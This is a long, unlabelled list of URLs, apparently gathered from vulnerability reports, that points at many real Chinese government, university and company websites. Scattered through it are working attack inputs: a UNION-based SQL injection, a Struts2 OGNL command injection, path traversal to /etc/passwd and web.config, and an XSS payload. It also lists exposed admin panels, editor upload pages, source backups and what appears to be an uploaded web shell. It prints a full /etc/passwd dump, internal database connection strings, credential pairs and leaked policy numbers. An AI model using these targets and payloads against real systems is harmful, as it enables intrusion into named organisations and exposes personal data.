http://www.rongcheng.gov.cn/jcms/service/WSSynchronize?wsdl http://www.yidu.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tzhl.gov.cn/jcms/service/WSSynchronize?wsdl http://www.cxyx.cn/jcms/service/WSSynchronize?wsdl http://www.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.yzu.edu.cn/jcms/service/WSSynchronize?wsdl 
http://www.gzwd.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sdfda.gov.cn/jcms/services/WSSynchronize?wsdl http://www.czzl.gov.cn/jcms/services/WSSynchronize?wsdl http://yxy.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://www.bisu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.nanxun.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sheshantravel.com/jcms/services/WSSynchronize?wsdl http://sha.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/services/WSSynchronize?wsdl http://fx.10.gov.cn/jcms/services/WSSynchronize?wsdl https://vpn.ct1000.com/dana-na/auth/url_0/welcome.cgi http://www.cc148.gov.cn/liuyan.jsp?id=1132 http://www.mount-tai.com.cn/wap/list.aspx?id=160 http://www.cnmo.com/xiaodao.tar.gz http://www.ieasy.tv/ http://www.ieasy.tv/index.php/news/detail?id=3056 http://external1.fesco.com.cn/NOKIA/nokiapquery/BBSList.aspx?Flag=1&BBSType=1 http://external1.fesco.com.cn/NOKIA/nokiapquery/BBSList.aspx?Flag=1&BBS http://www.sqlmap.org http://gongxiang.51tek.com/ http://wljx.ynftc.cn/include/htmleditor/admin/default.php http://211.141.201.156/include/htmleditor/admin/default.php http://jxzy.hcvt.cn/include/htmleditor/admin/login.php http://jp.cqepc.cn/include/htmleditor/admin/login.php http://pt.cqtbi.edu.cn/include/htmleditor/admin/login.php http://zyk.nxcy.edu.cn/include/htmleditor/admin/login.php http://kczy.cswu.cn//include/htmleditor/admin/login.php http://gongxiang.51tek.com/ http://gongxiang.51tek.com/admincp.php?action=user&todo=edit&tid=197 http://gongxiang.51tek.com/ gongxiang.51tek.com/admincp.php?action=department&todo=editdep&depid=56&do=0 http://gongxiang.51tek.com/ http://gongxiang.51tek.com/admincp.php?action=siteclass&todo=resume&classid=200 http://gongxiang.51tek.com/ http://gongxiang.51tek.com/departmentcp.php?action=department_news&todo=editnews&nid=130&id=34 http://www.okcis.cn/php/yaobiao/caigou.php?id=13001 
www.weidulinchang.com/admin/login.aspx guopei.xcu.edu.cn/About.asp?ID=21 zhuanti.xcu.edu.cn/lfy/news/news1.php?id=6 www.czfzb.gov.cn/admin/login.asp http://www.czfzb.gov.cn/123.asp http://www.95572.com/jsp/ywbl/zc.jsp http://see.tongji.edu.cn/TjComm/Ch/kyview.asp?ID=29 http://cad.tongji.edu.cn/cad/newslist.aspx?id=42 http://mat.tongji.edu.cn/StuLogin.aspx?id=1 http://cad.tongji.edu.cn/cad/newslist.aspx?id=42 http://user.rayli.com.cn/home.php?mod=space&do=wealth&gid= http://www.shyj.gov.cn/piclist.asp?classid=2 http://e12580.net/中国移动12580电子优惠券 http://789.e12580.net/login.aspx http://wap.hxrc.com http://114.255.121.29:8888 http://m.rayli.com.cn/article/video_search_test.php?page=&page=1&searchword=1&ver=iphone http://222.171.146.9/res/需要通过姓名和身份证号查询自己的考试信息,但是我发现http://222.171.146.9/res/info.php?cid=xxx(xxx代表三位数)直接通过更改后三位数,可以随意查看信息。包括身份证号和姓名以及考场信息。 http://eb.cs-air.com/kcbassess/assMan/Kcb_apassesstable_add.jsp?dotype=modify&apat_atid=1004&rt_depid=%28CAN%29%28%BF%CD%B2%D5%B2%BF%29 http://www.jzswsj.gov.cn/cs_lyb.jsp?catlogName=%E7%BD%91%E4%B8%8A%E6%8A%95%E8%AF%89&s_flag=0 http://www.mingjian.com/news.php?cid=132 http://www.easysale.me/system/login.do http://wifi.liebao.cn/top/index.php?s=/index/updataData sspai.com/account/emailsuccess?code=1 http://www.h3w.com.cn/index.html http://www.tongji-di.org/infor_news.asp?sid=12&id=894 http://www.ahbbjjjc.gov.cn/summaryarticle.php?MsgId=19514 http://mail.12306.cn/app/mail/login http://mail.12306.cn/app/mail/login http://edm.kongzhongedm13.com/unsubscribe_form.php?list_name=hkz007_list_1419236812&flag=1419237361&list_request=unsubscribe&email= https://member.hipiao.com/ MYSQL:root http://weibo.10086.cn/cwb/article.php?id=10404 http://www.yn.xinhuanet.com/v/2014-12/26/c_133880414.htm http://car.m.jd.com/jdshop.html?catId=400103411%22%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E http://wap.bjoil.com/htmlLogin/registration.action http://wj.gpjh.cn/ http://www.cloud511.com/case 
http://test.gxjjls.com/addUser.do?spreadUserId= http://www.jylbx.com/addUser.do?spreadUserId= http://www.hangzhoudrt.com/addUser.do?spreadUserId= http://www.smdyf.cn/addUser.do?spreadUserId= http://www.46buy.com/fyct/addUser.do?spreadUserId= http://www.sydyf.com/addUser.do?spreadUserId= http://fixedassets.ku6.cn/.svn/entries http://61.155.159.159/cacti/ http://116.58.221.12/login/userInfo!isCanSendPwd.action http://wap.vanho.cn/desc.action?cpId=600276&name=WapHelpOperation http://fxb.csair.com/bbs2/admin.php http://sms.taikang.com/admin.tar http://sms.taikang.com/admin/files/tk_plorer/ http://www.liyouit.com/ http://www.liyouit.com/feedbook.php http://serviceshop.lenovo.com.cn/purchase/orderconfirm.aspx?orderNo=这里是订单号 http://mp.sohu.com/imgview2/20141226/b03956fd3491467ebbb7ba8ef988d9e4.jpg http://jsbin.com/sefenepomi http://mp.sohu.com/main/ad/view.action http://km3.pw/Sohu%20Flash%20CORS.mp4 http://my.gfan.com/findPwdByMobile http://www.mafengwo.cn/path/44068065/27779-0.html http://acm.hdu.edu.cn/diy/contest_search.php?action=go http://fixedassets.ku6.cn/req_sub_business_list.php?business_id=1 failed:You http://www.airmacau.com.tw/tips/tips_searchresult.asp?Dest=MFM db:mssql db_name:tpe_web http://www.tyut.edu.cn/bwc/info_show.asp?id=738&bigid=2&smallid=14 http://www.tyut.edu.cn/wzb/login.asp http://wljg.gdgs.gov.cn/newslist.aspx?itemid=1 http://sso.118114.cn/SSO/loginV2.action http://www.wwwh.gov.cn/admin/Admin_Index.asp http://e.dianping.com/ http://ssc.zjweu.edu.cn/edit/admin/login.asp http://www.sinosig.com/logout,将使用户退出登录; http://www.sinosig.com/agent_modifyAgent.action?iocModifyPsnInfoFlagUrl= http://kjc.xtu.edu.cn/myphp/kjc/show.php?tid=3&nid=417%20aNd%201=2%20unIon%20all%20selEct%201,2,concat%280x5e5b,COLUMN_NAME,0x5d5e%29,4,5,6,7,8,9,10%20from%20information_schema.COLUMNS%20whEre%20TABLE_NAME=0x61646D696E75736572%20limit%201,1%23 http://stbc.hwcc.gov.cn/OutsideGroup/zhuanti_more.asp?LeiMuName=会议类专题报道&LeiMuName2=全国水土保持科技示范园区建设工作座谈会&ZhuantiID=6 
http://brand.wljhealth.com/div.php?act=giftPopExchange&id=1 http://www.dyxz.gov.cn//application/zwdt/query.jsp http://www.dyxz.gov.cn//application/zwdt/query.jsp http://www.dyxz.gov.cn//application/zwdt/query.jsp http://www.gzegn.gov.cn:8080//application/zwdt/query.jsp http://www.gzegn.gov.cn:8080//application/zwdt/query.jsp http://www.gzegn.gov.cn:8080//application/zwdt/query.jsp http://www.jhqz.com/Lifting/newsinfo.php?id=124 http://dep.hnust.cn/jd/manage/login.asp http://www.jit.com.cn/ http://222.34.78.21/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://218.27.207.22/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://222.160.140.29:8000/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://zwgk.wangqing.gov.cn/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://www.ilj.gov.cn/zwdtSjgl/info/gonggao_iframe.jsp?cid=3 http://www.jit.com.cn/ http://218.27.207.22/zwdtSjgl/infoIndex.jsp?channelCid=6 http://218.27.190.107:8080/zwdtSjgl/infoIndex.jsp?channelCid=9 http://218.27.140.5/zwdtSjgl/infoIndex.jsp?channelCid=6 http://www.jlfm.gov.cn:8081/zwdtSjgl/infoIndex.jsp?channelCid=6 http://218.62.90.168/zwdtSjgl/infoIndex.jsp?channelCid=9 http://job.fesco.com.cn/person/work_modi.asp?id=40000000366592&lang=0&action=1&rid=40000000255216 http://job.fesco.com.cn/person/addone_modi.asp?id=40000000108931&lang=0&action=1&rid=40000000255220 http://job.fesco.com.cn/person/letter_modi.asp?id=110088 http://job.fesco.com.cn/person/resume_modi.asp?action=1&rid=40000000255210 http://search.js.cei.gov.cn/004_zhnews/search/detail.php?id=10832 http://search.js.cei.gov.cn/ http://www.fyxf.fy.cn/dispnews.php?artid=70240 http://59.151.127.48/SystemOpsPlatform/php/Interface/receiveApplyFeedback.php http://www.ncjmw.gov.cn www.yichekey.com www.yichekey.com www.yichekey.com www.yichekey.com www.yichekey.com http://www.thermos.com.cn/news.php?curr_page=news_spec_detail&id=62 http://uqkun.taobao.com/ http://222.80.103.52:1000/XJPROJECTC/Login_userLogin.action http://222.80.103.52:1000/XJPROJECTC/bak.jsp 
http://wooyun.org/bugs/wooyun-2014-082767 www.gzbg100.cn http://www.changedu.com/ http://desktop.nju.edu.cn/cx/ http://dxscx.forestpolice.net/ http://180.209.64.18/cxcy/Index.aspx http://210.26.14.200/ http://sjjx.njit.edu.cn/cx/ http://nausrt.njau.edu.cn/ http://202.195.237.148/dcxm/Index.aspx http://sy.cxxy.seu.edu.cn/cx/ http://cx.njxzc.edu.cn/ http://210.38.64.108/cx/ http://cx.yctc.edu.cn/ http://cxsb.yzu.edu.cn/ http://cxcy.shisu.edu.cn/ http://cxcy.lzu.edu.cn/Index.aspx http://210.46.116.20/ http://jw1.jiangnan.edu.cn/dxscx/ http://202.119.81.120/ http://bylw.pk.njau.edu.cn/gxycx/ http://www.cz121.com/forecast/weatherjs.asp?vp=24 http://tgong.yaowan.com/gonggao/20371.html?username=daishenyang123&pwd=986513 http://**.**.**/logon.doprocessID=logonMail&userName=用户名@mail.china.com http://www.ysepay.com/ jxkjg.jxehe.com/manage/default.htm http://vip.yishion.com/card.php?id=1 http://csm.taikang.com/ec/csm/query/policyDetail.jsp?policyno=2801013639310&md5s=e8dff3a05b18ce1ce42cf8a7f4ef7c68 http://csm.taikang.com/ec/csm/query/policyDetail.jsp?policyno=2801013639327&md5s=de6ea342f87512b7ccc1f1c1a7d4fa83 http://csm.taikang.com/ec/csm/query/policyDetail.jsp?policyno=2801013639324&md5s=ed31d2b05ad64e0b37a1b4d8ee8531d9 http://www.tzxczs.com/ckfinder/ckfinder.html http://www.0513chaotai.com//ckfinder/ckfinder.html http://www.zycm-china.com//ckfinder/ckfinder.html http://www.east-rubber.com//ckfinder/ckfinder.html http://www.renature.cn//ckfinder/ckfinder.html http://www.linhaijiahao.com//ckfinder/ckfinder.html http://www.honormoto.cn//ckfinder/ckfinder.html http://www.zjtraffic.com//ckfinder/ckfinder.html http://www.chinaquila.com//ckfinder/ckfinder.html http://www.chinaquila.com//ckfinder/ckfinder.html http://www.cnyaren.cn//ckfinder/ckfinder.html http://zb.ujs.edu.cn:8080/phpadmin/index.php http://zb.ujs.edu.cn:8080/admin/ http://222.73.46.121:8080/ http://**.**.**/ http://data.gfan.com/invoker/JMXInvokerServlet/ https://passport.ly.com/Member/MemberLoginAjax.aspx 
http://oa.haust.edu.cn/ http://gmu.baidu.com/demo/data/tabs/proxy.php?debug=1&key=&file=proxy.php https://github.com/fex-team/GMU/blob/master/examples/data/tabs/proxy.php http://218.60.147.21:8080/test1.txt http://www.lorealprofessionnel.com.cn/admin/ http://124.207.155.136:8080/signUp/system/indexLogin.action http://gsgd.jnu.edu.cn/admin/login.asp http://gsgd.jnu.edu.cn/admin/Lt.Add.asp?Action=add&ModeID=1&ClassID=&Channel=Default http://gsgd.jnu.edu.cn/upfiles/20141227/20141227195016771677.asp http://success.hp.com/lexika/list.php?act=articlesearch&search[metainfo_id]=318432%27 http://125.88.6.173/main/UserManager-esmsLogin.action http://125.88.6.173/main/UserManager-esmsLogin.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://m.mafengwo.cn/sales/comments.php?id=311008 http://cc.ahmu.edu.cn/j_jxdt/index.php?ty=36&zlm=30 http://jskj.zjer.cn/ http://ffp.scal.com.cn/FFPNewWeb/ http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule http://cis.zjicm.edu.cn/?page_id= http://yyxy.zjicm.edu.cn/yyxynew/BigClass.asp?typeid=2&bigclassid=144 http://news.zjicm.edu.cn/ht http://218.75.124.141:8090/zjcm_gh/manage/main/pages/ http://cmxw.zjicm.edu.cn/ http://cmxw.zjicm.edu.cn/admin/editor/admin_login.asp http://mall.pigai.org http://www.pigai.org/index.php?c=teacher&f2= http://mall.pigai.org/static/.svn/entries http://www.pigai.org/index.php?c=teacher&a=createv2就绕过了。 https://finance.gagc.com.cn/server/login.jsp或https://gagc.com.cn/server/login.jsp http://i.ui.cn/ucenter/135516.html http://sales.wostore.cn:8083/active/wxseed_sharephone.action 
http://www.cqupt.edu.cn/cqupt/news.jsp?Type=zcfg&ID=zcfg24ec34c9-8d13-11e4-a5ed-005056932eca http://www.qzdj.gov.cn/SmallClass.asp?BName=%B8%C9%B2%BF%D6%AE%B4%B0&BType=0&SName=%D5%FE%B2%DF%B7%A8%B9%E6 inurl:login.asp http://www.ysgjjd.com/ysgjjd/Index.asp http://www.315online.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php http://zj.zjfzb.gov.cn:9999/zfjdpt/userLogin-logout.action http://www.hzcg.gov.cn/fckeditor/editor/fckdialog.html,而且没有做什么设置可以直接上传iis的解析漏洞格式 http://info.10010.com/chinaunicomSearchJB.zip jdbc:oracle:thin:@127.0.0.1:1521:yhxx jdbc:oracle:thin:@10.2.135.78:1521:yhxx jdbc:oracle:thin:@192.168.2.12:1521:ecom jdbc:oracle:thin:@10.142.195.58:1521:ecom jdbc:oracle:thin:@10.143.131.63:1521:ecom jdbc:oracle:thin:@10.143.131.63:1521:ecom http://www.cctime.com/weixin/index.asp?tid=952889(万恶的注入点) http://www.cctime.com/tm92dif/login/login.asp http://www.gtggjy.com/cqjy/cqjyzb/TSPBcqjyzbgg_List.jsp?pubType=1 http://www.gtggjy.com/TSPB/gtweb/public/ShowInfo.jsp?pubGuid=CC6102D433D07730D654922347990AD9 http://www.gtggjy.com/TSPB/gtweb/tender/gczb_List.jsp?itemType=1 http://www.gtggjy.com/TSPB/gtweb/tender/gczb_List.jsp?pubtitle= http://www.gtggjy.com/TSPB/gtweb/tender/gczb_List.jsp?pubType=1 http://www.gtggjy.com//TSPB/gtweb/xyxx/xyxx_List.jsp?cxLX= http://www.gtggjy.com/TSPB/NewsManager/NewsAttFileDownload.do?fileGuid=20D5FBB324C6B1C07D31ACD808398A9D http://www.hr135.com/company/index.php?m=index&c=index&id=3751&style=../../template/admin&tp=/admin_web_config http://218.83.241.245/cn.asp http://job.imau.edu.cn/Links.aspx?Cid=1 http://www1.imau.edu.cn/dangan/section0.php?sid=1 http://www1.imau.edu.cn/shengtai/about.php?mid=187、http://www1.imau.edu.cn/shengtai/xzzx.php?mid=162 http://115.236.99.179 http://115.236.99.179/mei.jsp http://s1.zqjlsj.funshion.com/ http://s1.zqjlsj.funshion.com//include/common.inc.php http://s1.zqjlsj.funshion.com///config.inc.php 
http://s1.zqjlsj.funshion.com///include/global.func.php http://s1.zqjlsj.funshion.com///include/security.inc.php http://www.ahmzyf.com/ http://218.23.98.37:8089/fckeditor/editor/filemanager/browser/default/browser.html?type=&connector=../../connectors/aspx/connector.aspx http://60.175.141.158:8089/fckeditor/editor/filemanager/browser/default/browser.html?type=&connector=../../connectors/aspx/connector.aspx http://60.173.161.48:8099/fckeditor/editor/filemanager/browser/default/browser.html?type=&connector=../../connectors/aspx/connector.aspx http://www.mafengwo.cn/group/ http://webxss.net/************ http://www.mafengwo.cn/group/ http://61.161.162.110/ www.315online.com/plus/feedback.php?aid=115005 http://221.215.1.144/login.aspx http://price.ziroom.com/?_p=../../../../../../../../../../../../../etc/passwd%00.html http://202.103.147.182:8080/ http://www.beij.12306.cn/Dzsw/Shky/hwky.nei/quickorder.action http://222.73.46.144/wealth/default.jsp http://fortune.cib.com.cn/ http://222.73.46.144/futures/picl.jsp?fileName=WEB-INF/web.xml http://222.73.46.144/product/orgFinList.jsp.bak http://222.73.46.144/index/report.jsp.bak http://222.73.46.144/product/content.jsp.bak http://222.73.46.144/price/about.jsp.bak http://222.73.46.144/index/adsearch.jsp.bak http://222.73.46.144/product/hotProductList.jsp.bak http://222.73.46.144//product/productContent.jsp.bak http://36.33.0.36:8099/可利用 http://36.33.0.36:8888/license!getExpireDateOfDays.action存在st2命令执行。 http://we.ztems.com/findImei.action http://61.153.64.219:8008/WebRoot/ http://www.xtst.gov.cn/down_tiao.aspx?x=../web.config&j=1 http://cloudclass.ouchn.edu.cn/ http://job.fesco.com.cn/company.rar http://www.hljforest.gov.cn:8888/yjzj/tousu/lanmu1_qiantao_07_2.jsp?fl=tousu http://www.mifan365.com/account/information_detail.php?id=49 http://service.boway.com/Default.aspx http://cnc.boway.com/Default.aspx www.smartcome.com,结果上去访问之后弹出,弹出的防御界面是百度云加速的图片 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 
http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://www.smartcome.com/forum.php?mod=viewthread&tid=1 http://124.65.124.98:7003/gjfpb/ http://kyxt.wh.sdu.edu.cn/login.jsp http://www.chinatt315.org.cn/sitemap.txt http://www.chinatt315.org.cn/2009315hd/qy_detail.asp?id=377 http://bbs.chinac.com/ http://secure.jlpadis.gov.cn/secure/countPlatform/ http://www.dagexing.com/ https://61.144.43.67:6443/ http://bbs.173.com/ http://fnqx.fy.cn/listnews.php?chnid=bg1 http://59.38.35.83:8080/login.action;jsessionid=EC8413A2E26E4BC0931F35C850873286?redirect=%2F www.fesco.com.cn www.fesco.com.cn http://www.suning.com.cn/update.aspx?type=delupfile&v2=image15.png http://www.suning.com.cn/djgz/login.asp http://180.168.124.197/site/login.htm http://dximg.imooc.com/ http://dximg.imooc.com/.svn/entries http://img.imooc.com inurl:e-learning/index.asp http://mall.lakala.com/orders/vieworder?ot=1368148428298&orderId=20130510105698 VERSION:1.2.3 http://cinvestors.tebon.com.cn/user/reg/user!reg.action http://gim.jlu.edu.cn/login.jsp http://hd.my.letv.com/action/userRank/?id=1000002_1'+and+'1'='1&n=15&callback= http://erp.suning.com.cn/epp/core/public/infodetail.jsp?pk_message=1003271000000000YB2N http://www.yuntongxun.com/member/smsTemplate/detail?id=5491&randStr=0.29231546563096344 http://nc.xhlbdc.com/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX http://nc.pinggugroup.com:81/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://erp.suning.com.cn/epp/core/public/infodetail.jsp?pk_message=1003271000000000YB2N http://123.232.105.202/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://nc55.hspark.com/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://202.136.213.21/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X 
http://erp.minyoun.com/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://zfkg.com:8081/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X http://61.175.97.50/epp/detail/publishinfodetail.jsp?pk_message=1002A31000000000BS0X https://mail.sgcc.com.cn/webmail/login/login.do pzhu:12345qwert http://shixi.189.cn/ http://shixi.189.cn/shixibao/space.php?do=xm_enterprise&ignore=1&companyid=134 http://shixi.189.cn/shixibao/e/member/login/loginjs.php?&user=0&mm=&t=0.12015561351379322 http://www.dagexing.com http://12580wap.10086.cn/wap5/wapindex.do?r.cityId=10000000&r.cityName=%E5%8C%97%E4%BA%AC&r.keyword=%E4%B8%AD%E9%80%9A%E5%BF%AB%E9%80%92%E5%8D%95%E5%8F%B7%E6%9F%A5%E8%AF%A2 http://erp.suning.com.cn//hrss/ http://erp.suning.com.cn http://zjrmfy.wuhai.gov.cn/ http://zjrmfy.wuhai.gov.cn//general/download.aspx?path=/web.config http://123.124.18.149/Learning/user/traincenter/DoorVideoEntry.action http://peixun.ciqcid.com/test/listAllTestPaper.action http://www.ls.hbnu.edu.cn/front-index.action http://www.fzwsrc.com/sydwzk/refer/frequent.jsp http://www.xmws.gov.cn/sydwzk/refer/frequent.jsp http://www.lywsrc.com/sydwzk/refer/frequent.jsp http://222.76.242.182/sydwzk/refer/frequent.jsp http://mx.smrsks.com/sydwzk/refer/frequent.jsp http://125.89.152.180:888/sydwzk/refer/frequent.jsp http://www.zzsyzp.com/sydwzk/refer/frequent.jsp www.52jscn.com,此网站是dedecms类型的,但是测试payload的时候,发现此站点使用了百度云加速防护。 http://www.52jscn.com/plus/search.php?keyword=123%20and%201=1 http://www.52jscn.com/plus/recommend.php http://web.zoosnet.net/zoosnet.rar http://118.144.76.63:8090/applicant/forwardResumeCollection http://gh.zufe.edu.cn/inc/gofixednewsList.asp?newsType=fixednews_820 gouser.3g.net.cn/userManage/ http://www.szmuseum.com/mod/shop/quest/ajax.php?op=auction_buy http://xyh.cdu.edu.cn/donatefile.php?id=7 http://xyh.cdu.edu.cn/schnewslist.php?id=2 http://wsxx.cdu.edu.cn/product/product.php?Cat_ID=29 http://wsxx.cdu.edu.cn/about/About.php?ID=1 
http://old.xtgtzy.gov.cn/list.asp?classId=10 http://old.xtgtzy.gov.cn/Article-photo.asp?ArticleID=309 http://old.xtgtzy.gov.cn/chinese/Bs_DownloadShow.asp?Bs_DownID=104 http://old.xtgtzy.gov.cn/chinese/Bs_NewsInfo.asp?Action=Co&ID=88 http://old.xtgtzy.gov.cn/Article-photo.asp?ArticleID=309 http://www.cqfzb.gov.cn/web.rar http://uc.pcpop.com/uc_login.php?returnurl=http://www.pcpop.com http://uc.pcpop.com http://www.auto.hc360.com/web.rar http://www.baoshan.gov.cn/web.rar http://**.**.**/ http://mnote.weibo.10086.cn http://www.dapu.com/gallery-index-.html?scontent=n|%E6%AF%9B%E5%B7%BE http://www.dapu.com/gallery-index-.html?scontent=n|%E6%AF%9B%E5%B7%BE http://inc.form.xiaoma.com www.qinsmoon.com http://www.sgeg.shenhuagroup.com.cn/wzcg.jsp?id=411&pid=387&type=MENU http://www.airmacau.com.tw/about/news_articles.asp?id=220 http://www.airmacau.com.tw:8083/about/news_articles.asp?id=49 http://qqy.fjii.com/为福建省全球眼使用分布情况。 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin 
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin htt:x:100:103:IIIMF Htt:/usr/lib/im:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash canna:x:39:39:Canna User:/var/lib/canna:/sbin/nologin wnn:x:49:49:Wnn Server:/var/lib/wnn:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash fax:x:78:78:mgetty user:/var/spool/fax:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false radiusd:x:95:95:radiusd user:/:/bin/false radvd:x:75:75:radvd user:/:/sbin/nologin megaeyes:x:500:500::/home/megaeyes:/bin/bash xmwangwei:x:501:501::/home/xmwangwei:/bin/bash qqysom:x:502:502::/home/qqysom:/bin/bash jdbc:oracle:thin:@172.16.2.13:1521:mega http://192.168.4.96 http://192.168.4.38:2006/ehome/services/UserService http://192.168.4.38:2006/ehome/services/CompanyService http://192.168.4.20:2006/ehome/services/DeviceService http://192.168.4.38:2006/ehome/services/ManufacturerService http://192.168.4.31:2006/ehome/services/PhotoService 
http://192.168.4.96:2006/ehome/services/AlarmService http://192.168.4.38:2006/ehome/services/PermissionService http://www.sts.sdu.edu.cn/sts/admin/ http://dec.jlu.edu.cn/baozi//WhatyEditor/edit.htm http://119.48.218.181/jludec/WhatyEditor/edit.htm http://222.168.41.249//jludec/WhatyEditor/edit.htm http://202.198.17.229/jludec/WhatyEditor/edit.htm http://dec.jlu.edu.cn/baozi/incoming/114115175241_test.jspx http://119.48.218.181/jludec/incoming/11411694824_test.jspx http://222.168.41.249/jludec/incoming/11411694824_test.jspx http://202.198.17.229/jludec/incoming/11411694824_test.jspx http://220.178.10.84:8081/ShenBaoOA/dwInfoAction_toAddPassword.action?pk= http://61.153.3.19/Ty_Web_Sms/Web/Ty_Login.aspx http://jsjjx.njfu.edu.cn/boarddetail.asp?id1=32 http://sygl.njfu.edu.cn/zhanshi.aspx?centid=32 http://szbks.njfu.edu.cn/paperedit.asp?paperno= http://szbks.njfu.edu.cn/userinfoview.asp?userid= http://**.**.**/userpages/SerchList.aspxParams=%27 http://app.open.56.com/ http://app.open.56.com/wp http://app.open.56.com/dede/plus/open56.php http://app.open.56.com/phpcms http://app.open.56.com/discuz http://app.open.56.com/discuz/ http://app.open.56.com/discuz/install/index.php http://www.ahzfcg.gov.cn:93/ http://58.241.17.92:8004/login.asp http://xwb.hebtu.edu.cn:80/xwxx/manager/8xwxx.asp?ksh=xxx http://www.xgjt.gov.cn/xxfb/zskshow_1.jsp?unid=6E03130A002326AB151A00136BDB3057 http://dzll.haier.net:8888/providerUnlock.jsp http://mail.12306.cn/app/mail/login http://www2.sdwz.cn/netcr/liebiao/content.php?cid=9&aid=19%27 http://www.xgxz.gov.cn/NoticeDetail.aspx?type=notice&id=2442 http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001 http://romgame.gfan.com/index.php/gtphone?areacode=* http://t2.fanwe.net/wb_e7c77e55cdecd1e3.txt http://www.lingmov.com/ inurl:/page/Product_Details.asp?P_ID= http://www.shxinduan.com//Netsys/NetsysData/NetsysData.mdb http://www.xinhaowl.com//Netsys/NetsysData/NetsysData.mdb 
